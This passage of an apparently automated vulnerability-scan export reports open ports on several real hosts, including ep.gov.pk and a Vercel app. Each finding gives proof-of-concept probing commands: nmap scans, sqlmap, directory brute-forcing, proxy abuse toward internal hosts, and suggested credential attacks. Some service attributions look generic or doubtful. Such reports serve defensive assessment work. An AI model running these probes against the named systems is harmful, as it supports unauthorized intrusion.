(Proof of Concept)**  \nUsing OpenSSL, an attacker inspects the SSL/TLS certificate:\n\n```bash\nopenssl s_client -connect 64.29.17.67:443\n```\n\nThey check for weak cipher suites or expired certificates. 
Alternatively, they perform enumeration:\n\n```bash\nnmap --script ssl-enum-ciphers -p443 64.29.17.67\n```\n\nThis helps determine if cryptographic weaknesses exist that could be leveraged in man-in-the-middle scenarios.\n\n**Business Impact**  \nWhile essential for encrypted communication, improperly configured HTTPS services can expose organizations to protocol downgrade attacks, data interception, or compliance violations under regulations such as PCI-DSS or GDPR.\n\n---\n\n### Open Port 80/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description**  \nPort 80/tcp is open on 64.29.17.67, indicating that an HTTP service is available. This is typical for web servers but also presents risks when used alongside HTTPS unless properly redirected. Misconfigurations here can leak sensitive information or allow attackers to bypass encryption.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker sends a basic HTTP request:\n\n```bash\ncurl -I http://64.29.17.67/\n```\n\nThey look for redirects to HTTPS, presence of cookies without Secure flags, or leakage of internal paths. In some cases, cleartext credentials or session tokens may be transmitted inadvertently.\n\n**Business Impact**  \nFailure to enforce HTTPS across all endpoints leaves users susceptible to eavesdropping and credential theft. Organizations may face reputational harm or regulatory sanctions if user data is compromised through insecure transmission methods.\n\n---\n\n### Open Port 8008/tcp on 64.29.17.67\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.67 |\n\n**Description**  \nPort 8008/tcp is open on 64.29.17.67. This port is occasionally used for alternative HTTP services or development environments. 
Its exposure should be reviewed to ensure it aligns with intended use and does not introduce unintended access vectors.\n\n**Attack Scenario (Proof of Concept)**  \nThe attacker probes the service:\n\n```bash\ncurl http://64.29.17.67:8008/\n```\n\nThey analyze responses for debug output, stack traces, or administrative interfaces that should not be publicly accessible. Such findings can aid lateral movement or privilege escalation.\n\n**Business Impact**  \nDevelopment or test services exposed to production networks pose significant risks, including accidental exposure of source code, debugging features, or backdoor functionality.\n\n---\n\n### Open Port 80/tcp on 64.29.17.3\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.3 |\n\n**Description**  \nPort 80/tcp is open on 64.29.17.3, suggesting that an HTTP service is active. As with other instances, this port should ideally redirect to HTTPS or have strong protections against insecure communications.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker issues a simple HTTP request:\n\n```bash\ncurl -v http://64.29.17.3/\n```\n\nThey examine headers and body content for signs of redirection behavior, cookie handling, or server-side errors that reveal system internals.\n\n**Business Impact**  \nInsecure HTTP services undermine trust and violate best practices around encrypted communication. They remain targets for passive surveillance and active tampering.\n\n---\n\n### Open Port 443/tcp on 64.29.17.3\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 64.29.17.3 |\n\n**Description**  \nPort 443/tcp is open on 64.29.17.3, confirming that a TLS-enabled web service is present. 
This is expected for modern websites; however, the actual security posture depends on proper TLS configuration and backend hardening.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker uses `nmap` to inspect supported protocols:\n\n```bash\nnmap --script ssl-enum-ciphers -p443 64.29.17.3\n```\n\nThey also attempt to retrieve the certificate chain:\n\n```bash\necho | openssl s_client -showcerts -connect 64.29.17.3:443\n```\n\nWeak ciphers or self-signed certificates may indicate poor security hygiene.\n\n**Business Impact**  \nPoorly managed TLS implementations erode customer confidence and expose the organization to decryption risks, especially in regulated industries requiring robust encryption standards.\n\n---\n\n### Open Port 80/tcp (HTTP) – Vercel Service on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description**  \nPort 80/tcp is open and identified as serving HTTP traffic from a Vercel-hosted application. Although Vercel generally enforces automatic HTTPS redirection, the availability of plaintext HTTP remains a concern unless explicitly disabled or redirected.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker accesses the site over HTTP:\n\n```bash\ncurl -I http://cp-club-vjti.vercel.app/\n```\n\nThey verify whether the platform automatically redirects to HTTPS. If not, they may attempt to intercept traffic or exploit browser behaviors related to mixed-content policies.\n\n**Business Impact**  \nAllowing cleartext HTTP access undermines end-user privacy and violates industry expectations regarding secure web delivery. 
It may result in warnings from browsers or rejection by compliance auditors.\n\n---\n\n### Open Port 443/tcp (HTTPS) – Golang net/http Server on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description**  \nPort 443/tcp serves HTTPS traffic powered by a Go-based HTTP server (`net/http`). While functional, default implementations of this library do not include hardened defaults for security headers or rate limiting, potentially exposing subtle weaknesses.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker inspects HTTP headers returned by the server:\n\n```bash\ncurl -I https://cp-club-vjti.vercel.app/\n```\n\nMissing headers like `Strict-Transport-Security`, `X-Content-Type-Options`, or `Content-Security-Policy` suggest inadequate protection against common web threats such as XSS or clickjacking.\n\n**Business Impact**  \nLack of defensive HTTP headers exposes users to client-side attacks and reduces resilience against phishing or malicious script injection attempts.\n\n---\n\n### Open Port 8008/tcp (HTTP) on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description**  \nPort 8008/tcp is open and responding to HTTP requests on the domain cp-club-vjti.vercel.app. 
This non-standard port may serve auxiliary functions or development APIs, increasing the overall attack surface unnecessarily.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker queries the endpoint directly:\n\n```bash\ncurl http://cp-club-vjti.vercel.app:8008/\n```\n\nThey search for API documentation, debug interfaces, or internal routing logic that shouldn’t be exposed externally.\n\n**Business Impact**  \nExposing alternate HTTP ports without explicit purpose introduces complexity into perimeter defense strategies and raises the likelihood of misconfiguration leading to unauthorized access.\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy) – FortiGuard Web Filtering on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description**  \nPort 8015/tcp operates as an HTTP proxy identified as FortiGuard Web Filtering. Proxies exposed to public internet increase risk of misuse for tunneling traffic or bypassing controls. Their presence requires careful review of access restrictions and logging capabilities.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker tests proxy connectivity:\n\n```bash\ncurl --proxy http://cp-club-vjti.vercel.app:8015 http://example.com\n```\n\nIf successful, they can route arbitrary traffic through the proxy, potentially masking their identity or evading detection systems.\n\n**Business Impact**  \nPublicly accessible proxies facilitate abuse by adversaries seeking anonymity or attempting to circumvent corporate firewalls. 
They represent both a reputational liability and a direct security threat.\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy) – FortiGuard Web Filtering on cp-club-vjti.vercel.app\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description**  \nSimilar to port 8015, port 8020/tcp runs an HTTP proxy leveraging FortiGuard Web Filtering technology. Public accessibility of such infrastructure poses similar risks of unauthorized usage and abuse.\n\n**Attack Scenario (Proof of Concept)**  \nThe attacker configures a browser or tool to utilize the proxy:\n\n```bash\nexport http_proxy=http://cp-club-vjti.vercel.app:8020\ncurl http://ifconfig.me\n```\n\nSuccessful execution confirms the proxy accepts external traffic, enabling anonymized browsing or evasion of geolocation filters.\n\n**Business Impact**  \nUnrestricted proxy access invites exploitation for illicit activities, including spam distribution, malware propagation, or circumvention of regional content restrictions.\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.6 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) |\n| Category | network_exposure |\n| Asset / URL | cp-club-vjti.vercel.app |\n\n**Description**  \nThe domain cp-club-vjti.vercel.app appears on the DNS-based blacklist `list.quorum.to` categorized as SPAM. This listing may stem from historical abuse, shared hosting reputation, or misclassified legitimate activity. Regardless of cause, blacklisting affects deliverability and credibility.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker checks the domain’s reputation using online tools or DNSBL lookup utilities:\n\n```bash\ndig +short TXT 3.17.29.64.list.quorum.to\n```\n\nA positive match confirms the listing. 
Malicious actors may leverage this knowledge to justify targeting emails sent from the domain or discounting alerts originating from affected IPs.\n\n**Business Impact**  \nBlacklisted domains suffer reduced email deliverability, damaged brand perception, and increased scrutiny from security vendors. Remediation involves contacting the blacklist maintainer and addressing root causes of the listing.","summary":{"total":13}},"summary":{"total":13}},{"_id":{"$oid":"6a142b46ba5c57127fc7b8ac"},"created_at":{"$date":"2026-05-25T10:58:14.535Z"},"url":"https://ep.gov.pk/","tool":"generate_network_exposure_report","result":{"url":"https://ep.gov.pk/","category":"network_exposure","timestamp":"2026-05-25T10:58:14.528221+00:00","report":"### Open Port 8020/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8020/tcp is open on the host at IP address `124.109.52.82`. This port is commonly associated with HTTP proxy services or custom web applications. The exposure of such ports can indicate that internal or intermediary systems are accessible from external networks without proper access controls.\n\nAn attacker may identify this open port using standard reconnaissance tools like Nmap or Masscan during initial enumeration phases. If the service running behind the port is misconfigured or lacks authentication mechanisms, it could expose sensitive functionality or act as a pivot point into deeper infrastructure layers.\n\n**Attack Scenario (Proof of Concept)**  \n1. An attacker performs a SYN scan against the target IP:\n   ```bash\n   nmap -p 8020 124.109.52.82\n   ```\n2. Upon confirming the port is open, they attempt to connect via browser or curl:\n   ```bash\n   curl http://124.109.52.82:8020/\n   ```\n3. 
Depending on response headers or content returned, further fingerprinting can reveal software versions or configuration weaknesses.\n4. If acting as an HTTP proxy, the attacker might try sending requests through it:\n   ```bash\n   curl --proxy http://124.109.52.82:8020 http://internal-service.local/admin\n   ```\n\nIf successful, unauthorized access to internal resources or bypassing perimeter defenses becomes possible.\n\n**Business Impact**  \nWhile not inherently exploitable by itself, exposing non-standard ports increases the attack surface and provides additional vectors for exploitation if other vulnerabilities exist within the service. It also raises concerns about insecure configurations or lack of segmentation between public-facing and internal systems.\n\n---\n\n### Open Port 8015/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nTCP port 8015 is open on the system located at `124.109.52.82`. This port often serves as an alternative HTTP port used by proxies, application servers, or development environments. Its presence indicates potential exposure of backend or auxiliary services directly reachable over the internet.\n\nAttackers typically discover such ports through full-range TCP scans (`nmap -p-`) or targeted scanning of known alternate HTTP ports. If left unhardened, these endpoints can leak information or provide unintended access paths.\n\n**Attack Scenario (Proof of Concept)**  \n1. Perform a detailed scan to confirm service details:\n   ```bash\n   nmap -sV -p 8015 124.109.52.82\n   ```\n2. Connect to the endpoint:\n   ```bash\n   curl http://124.109.52.82:8015/\n   ```\n3. Analyze server headers and body for clues about underlying technology or internal routing rules.\n4. 
Attempt to use the service as a forward proxy or test for SSRF vulnerabilities if applicable.\n\nIn some cases, poorly configured reverse proxies or API gateways listening on this port may allow lateral movement or unauthorized resource access.\n\n**Business Impact**  \nExposing auxiliary HTTP ports increases risk due to expanded visibility of internal architecture. Even benign-looking services can become entry points when combined with other flaws such as weak authentication or outdated components.\n\n---\n\n### Open Port 8008/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8008/tcp is open on the asset `124.109.52.82`, which is frequently used for alternative HTTP services, including embedded devices, IoT appliances, or lightweight web interfaces. These types of services are often overlooked in hardening procedures and may retain default credentials or debug features enabled.\n\nSuch ports are easily discovered through routine port scanning techniques and represent low-hanging fruit for attackers seeking quick wins or footholds inside a network.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan the target:\n   ```bash\n   masscan 124.109.52.82 -p 8008\n   ```\n2. Access the service:\n   ```bash\n   curl http://124.109.52.82:8008/\n   ```\n3. Inspect responses for banners, login prompts, or diagnostic output.\n4. Try common default credentials or brute-force attacks if authentication is present.\n\nIf the device has administrative functions exposed, compromise could lead to persistent control or data exfiltration.\n\n**Business Impact**  \nUnmanaged exposure of alternate HTTP ports poses risks related to unauthorized access, especially if legacy or vendor-default settings remain active. 
In worst-case scenarios, attackers gain direct control over critical infrastructure components.\n\n---\n\n### Open Port 80/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nStandard HTTP port 80 is open on the IP address `124.109.52.82`. While expected behavior for publicly hosted websites, improper configuration or outdated software can introduce significant security gaps. Services running here should be hardened and monitored continuously.\n\nThis port is universally scanned by adversaries and automated scanners alike, making it a primary focus area for both legitimate traffic handling and malicious probing.\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify the service version:\n   ```bash\n   nmap -sV -p 80 124.109.52.82\n   ```\n2. Request homepage:\n   ```bash\n   curl http://124.109.52.82/\n   ```\n3. Enumerate directories or files:\n   ```bash\n   gobuster dir -u http://124.109.52.82 -w /usr/share/wordlists/dirb/common.txt\n   ```\n4. Test for vulnerabilities based on identified technologies (e.g., SQL injection, XSS).\n\nA vulnerable web application on this port could result in full system compromise depending on backend integrations.\n\n**Business Impact**  \nPublicly accessible HTTP services increase organizational exposure to web-based threats. Without adequate protection measures, breaches originating from this interface can escalate rapidly into broader infrastructural compromises.\n\n---\n\n### Open Port 443/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nHTTPS port 443 is open on `124.109.52.82`, indicating encrypted communication support. 
However, merely having TLS does not guarantee secure implementation; certificate validity, cipher strength, protocol versions, and renegotiation settings all play crucial roles in determining actual security posture.\n\nAdversaries will inspect SSL/TLS configurations to find downgrade opportunities or exploit deprecated protocols still in use.\n\n**Attack Scenario (Proof of Concept)**  \n1. Check supported ciphers and protocols:\n   ```bash\n   sslscan https://124.109.52.82\n   ```\n2. Validate certificate chain integrity:\n   ```bash\n   openssl s_client -connect 124.109.52.82:443\n   ```\n3. Attempt man-in-the-middle attacks leveraging weak encryption suites or expired certificates.\n4. Exploit protocol downgrade vulnerabilities if older SSL versions are accepted.\n\nMisconfigurations here can undermine user trust and enable interception of sensitive communications.\n\n**Business Impact**  \nImproper TLS setup undermines confidentiality guarantees essential for secure transactions. Regulatory compliance failures and customer distrust follow suit, particularly in sectors requiring high assurance levels.\n\n---\n\n### Open Port 80/tcp (http) — Microsoft-HTTPAPI/2.0 on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nThe domain `ep.gov.pk` exposes port 80 running Microsoft HTTP API v2.0, a kernel-mode driver providing basic HTTP capabilities for Windows-based applications. Commonly seen in IIS setups or self-hosted .NET services, this service may lack robust logging or input sanitization unless explicitly configured otherwise.\n\nAttackers recognize this signature quickly and tailor their approach accordingly—especially targeting known CVEs affecting specific builds of the component.\n\n**Attack Scenario (Proof of Concept)**  \n1. 
Confirm service identity:\n   ```bash\n   curl -I http://ep.gov.pk\n   # Server: Microsoft-HTTPAPI/2.0\n   ```\n2. Probe for directory traversal or verb tampering:\n   ```bash\n   curl -X TRACE http://ep.gov.pk/\n   ```\n3. Attempt buffer overflow exploits if vulnerable versions are detected.\n4. Combine findings with other exposed endpoints for escalation possibilities.\n\nExploitation depends heavily on patch level and whether additional protections like WAFs are in place.\n\n**Business Impact**  \nUse of generic Microsoft HTTP APIs without sufficient hardening leaves organizations susceptible to well-documented remote code execution flaws tied to older releases. Public availability amplifies impact significantly.\n\n---\n\n### Open Port 443/tcp (tcpwrapped) on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nPort 443 on `ep.gov.pk` returns a \"tcpwrapped\" state, suggesting that connections are filtered or intercepted before reaching the intended service. This usually implies the presence of a firewall, load balancer, or intrusion prevention system performing deep packet inspection or connection throttling.\n\nAlthough this reduces direct exposure, it doesn’t eliminate underlying risks entirely. Misconfigured wrappers can still leak metadata or respond inconsistently under stress conditions.\n\n**Attack Scenario (Proof of Concept)**  \n1. Observe inconsistent behavior across multiple requests:\n   ```bash\n   while true; do nc -zv ep.gov.pk 443; sleep 1; done\n   ```\n2. Send malformed packets to trigger different wrapper responses:\n   ```bash\n   hping3 -c 10 -S -p 443 ep.gov.pk\n   ```\n3. 
Monitor timing differences or error messages that hint at internal topology or filtering logic.\n\nAdvanced adversaries may deduce internal structures even behind wrapped ports.\n\n**Business Impact**  \nWhile tcpwrapping adds a layer of obscurity, it introduces complexity that can degrade performance or create false positives/negatives in monitoring systems. Poorly implemented wrappers may inadvertently disclose more than intended.\n\n---\n\n### Open Port 8008/tcp (http) on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nAlternative HTTP port 8008 is accessible on `ep.gov.pk`. As previously noted, such ports often serve auxiliary functions and may not undergo the same scrutiny applied to standard web ports. They're attractive targets because they’re less likely to be included in baseline security policies.\n\nReconnaissance tools readily detect these ports, enabling attackers to map out extended attack surfaces beyond traditional web interfaces.\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan for open ports:\n   ```bash\n   nmap -p 8000-9000 ep.gov.pk\n   ```\n2. Connect to the service:\n   ```bash\n   curl http://ep.gov.pk:8008/\n   ```\n3. Look for banners, redirects, or debug pages indicating internal usage.\n4. Attempt to abuse any exposed APIs or undocumented features.\n\nDepending on purpose, this port may grant access to staging areas, management consoles, or internal dashboards.\n\n**Business Impact**  \nExposing non-standard HTTP ports widens the organization’s digital footprint unnecessarily. 
Each new endpoint increases maintenance overhead and potential breach points, especially if deployed hastily without proper oversight.\n\n---\n\n### Open Port 8015/tcp (http-proxy) — FortiGuard Web Filtering on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nPort 8015 on `ep.gov.pk` runs Fortinet's FortiGuard Web Filtering service, typically deployed as part of enterprise-grade firewalls or secure web gateways. Although designed to enforce policy compliance, exposing such services externally creates risks around misconfiguration or bypass attempts.\n\nAttackers familiar with Fortinet products may attempt to exploit known vulnerabilities or probe for default credentials, especially if the instance hasn't been updated regularly.\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify product version:\n   ```bash\n   curl -I http://ep.gov.pk:8015\n   ```\n2. Search for default login portals:\n   ```bash\n   curl http://ep.gov.pk:8015/login\n   ```\n3. Attempt credential stuffing or dictionary attacks if authentication is enforced.\n4. Investigate whether proxy chaining is allowed:\n   ```bash\n   curl --proxy http://ep.gov.pk:8015 http://google.com\n   ```\n\nSuccessful misuse could allow unrestricted outbound browsing or tunneling of malicious traffic.\n\n**Business Impact**  \nExternal accessibility of filtering/proxy services presents dual risks: either becoming compromised themselves or being abused to facilitate secondary attacks. 
Both outcomes carry serious implications regarding regulatory adherence and operational continuity.\n\n---\n\n### Open Port 8020/tcp (http-proxy) — FortiGuard Web Filtering on ep.gov.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | ep.gov.pk |\n\n**Description**  \nSimilar to port 8015, port 8020 hosts another instance of Fortinet’s FortiGuard Web Filtering solution. Multiple instances suggest redundancy or multi-tiered deployment strategies but also multiply the number of potential ingress points for attackers.\n\nEach exposed proxy increases complexity in managing consistent security postures and requires vigilant patching schedules to avoid exploitation of shared vulnerabilities.\n\n**Attack Scenario (Proof of Concept)**  \n1. Verify service type:\n   ```bash\n   curl -I http://ep.gov.pk:8020\n   ```\n2. Explore available endpoints:\n   ```bash\n   curl http://ep.gov.pk:8020/status\n   ```\n3. Test proxy functionality:\n   ```bash\n   curl --proxy http://ep.gov.pk:8020 http://internal-api.corp/data\n   ```\n4. Attempt privilege escalation or lateral movement if internal access is achieved.\n\nCompromise of one proxy node can cascade into broader network infiltration given sufficient permissions.\n\n**Business Impact**  \nMultiple exposed proxy nodes complicate incident detection and remediation efforts. 
Any single node failure or compromise affects overall resilience and potentially grants adversaries unfettered access to protected segments.","summary":{"total":10}},"summary":{"total":10}},{"_id":{"$oid":"6a155da4ecafc28a4bf6e8ef"},"created_at":{"$date":"2026-05-26T08:45:24.056Z"},"url":"https://ep.gov.pk/","tool":"generate_network_exposure_report","result":{"url":"https://ep.gov.pk/","category":"network_exposure","timestamp":"2026-05-26T08:45:24.046822+00:00","report":"### Open Port 8020/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8020/tcp is open on the IP address `124.109.52.82`. This port typically does not have a standardized use but may be used by custom applications, proxy services, or internal web interfaces. The exposure of such ports can indicate misconfigurations or unnecessary services running without proper access controls.\n\nAn attacker would identify this using standard port scanning tools like Nmap or Masscan to enumerate all open TCP ports across the target system. If further fingerprinting reveals that this port serves HTTP traffic or acts as a proxy, it becomes a potential entry point for reconnaissance or exploitation.\n\n**Attack Scenario (Proof of Concept)**  \n1. An attacker performs a full TCP SYN scan against `124.109.52.82`:\n   ```bash\n   nmap -p- 124.109.52.82\n   ```\n2. Upon discovering port 8020 is open, they attempt banner grabbing:\n   ```bash\n   nc -v 124.109.52.82 8020\n   GET / HTTP/1.1\n   Host: 124.109.52.82\n   ```\n3. 
If the response indicates an HTTP-based service or proxy behavior, the attacker might explore directory traversal, authentication bypasses, or known vulnerabilities specific to the software stack behind the port.\n\n**Business Impact**  \nWhile this finding alone poses minimal risk, exposing non-standard ports increases the attack surface unnecessarily. It may lead to unauthorized access if the underlying service has weak configurations or unpatched flaws. Additionally, regulatory auditors often flag exposed administrative or development endpoints during compliance reviews.\n\n---\n\n### Open Port 8015/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8015/tcp is open on the host at `124.109.52.82`. Like other high-numbered ports, it's commonly used for application-specific purposes such as reverse proxies, API gateways, or internal dashboards. Its presence suggests either intentional configuration or accidental exposure due to lack of firewall rules.\n\nAttackers routinely scan for these types of ports since they are less likely to be monitored closely compared to well-known ports like 80 or 443. Identification involves basic port scanning followed by service detection via banners or protocol negotiation attempts.\n\n**Attack Scenario (Proof of Concept)**  \n1. A scanner identifies port 8015 as open:\n   ```bash\n   masscan 124.109.52.82 -p8015\n   ```\n2. Using Nmap for deeper inspection:\n   ```bash\n   nmap -sV -p8015 124.109.52.82\n   ```\n3. 
If identified as an HTTP proxy (e.g., FortiGuard), attackers may test for bypass techniques or abuse it for anonymized requests:\n   ```bash\n   curl --proxy http://124.109.52.82:8015 http://internal-service.local/admin\n   ```\n\n**Business Impact**  \nExposing internal-facing infrastructure through public proxies can allow lateral movement within the organization’s network. Even if benign, such exposures increase operational complexity and audit risks, especially when tied to third-party filtering appliances like Fortinet products which require strict segmentation policies.\n\n---\n\n### Open Port 8008/tcp on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 8008/tcp is open on the asset `124.109.52.82`. Historically associated with alternative HTTP servers or embedded device interfaces, this port should only be accessible internally unless explicitly required for external communication. Its visibility externally raises concerns about improper network zoning or insecure default configurations.\n\nAttackers will probe this port after initial discovery to determine whether it hosts a vulnerable web server, debug interface, or management console.\n\n**Attack Scenario (Proof of Concept)**  \n1. Initial scan discovers the port:\n   ```bash\n   nmap -p8008 124.109.52.82\n   ```\n2. Service enumeration shows it's serving HTTP content:\n   ```bash\n   curl http://124.109.52.82:8008/\n   ```\n3. Further exploration could reveal sensitive directories or endpoints:\n   ```bash\n   gobuster dir -u http://124.109.52.82:8008/ -w /usr/share/wordlists/dirb/common.txt\n   ```\n\n**Business Impact**  \nIf this port exposes administrative functionality or debugging features, it could enable privilege escalation or information disclosure. 
Even if harmless, its exposure contributes to an expanded attack surface and violates defense-in-depth principles.\n\n---\n\n### Open Port 80/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nThe standard HTTP port (80/tcp) is open on `124.109.52.82`, indicating that a web server is actively listening for incoming connections. While expected for publicly hosted websites, the absence of TLS encryption makes communications susceptible to interception and manipulation.\n\nThis port was accessed under the context of the domain `https://ep.gov.pk/`, suggesting that the IP hosts multiple services or virtual hosts. Attackers typically begin their reconnaissance here, leveraging automated scanners to detect outdated CMS versions, misconfigured headers, or exposed backend paths.\n\n**Attack Scenario (Proof of Concept)**  \n1. Confirm accessibility:\n   ```bash\n   curl http://124.109.52.82\n   ```\n2. Enumerate subdirectories:\n   ```bash\n   dirsearch -u http://124.109.52.82\n   ```\n3. Test for common vulnerabilities such as XSS or SQL injection:\n   ```bash\n   sqlmap -u \"http://124.109.52.82/search?q=test\" --batch\n   ```\n\n**Business Impact**  \nHosting plaintext HTTP services increases the likelihood of credential theft, session hijacking, and man-in-the-middle attacks. Organizations relying solely on HTTP also face SEO penalties from search engines and reduced trust from users who expect secure browsing experiences.\n\n---\n\n### Open Port 443/tcp Detected on 124.109.52.82\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 124.109.52.82 |\n\n**Description**  \nPort 443/tcp is open on `124.109.52.82`, signifying that HTTPS traffic is accepted. 
